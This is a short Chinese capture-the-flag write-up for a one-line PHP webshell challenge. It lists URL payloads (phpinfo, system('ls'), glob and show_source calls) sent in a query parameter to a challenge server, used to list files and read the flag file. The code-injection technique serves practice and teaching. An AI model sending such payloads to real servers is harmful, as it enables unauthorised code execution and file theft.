[Writeup] “过狗一句话”解题思路

小帅帅 6740 0

上来就给出了一句话 猜想是直接利用一句话 于是构造payload

http://120.24.86.145:8010/index.php?s=phpinfo();

发现成功执行。于是尝试能否执行cmd命令

http://120.24.86.145:8010/index.php?s=system('ls');

发现返回空白页面 没有任何信息说明执行失败,这里猜想是权限被控制了于是用另一种方法来读取文件

http://120.24.86.145:8010/index.php?s=print_r(glob('*.php'));

发现只回显了一个index.php页面于是修改后缀

http://120.24.86.145:8010/index.php?s=print_r(glob('*.txt')); 发现有一个txt文件于是尝试读取

http://120.24.86.145:8010/index.php?s=show_source('ds231e.txt');

成功getflag

这里可以用其他方式读取 :

var_dump(file("./ds231e.txt"));

print_r(file("./ds231e.txt"));

注:glob() 函数返回匹配指定模式的文件名或目录。该函数返回一个包含有匹配文件 / 目录的数组。

发表评论 (已有0条评论)

还木有评论哦,快来抢沙发吧~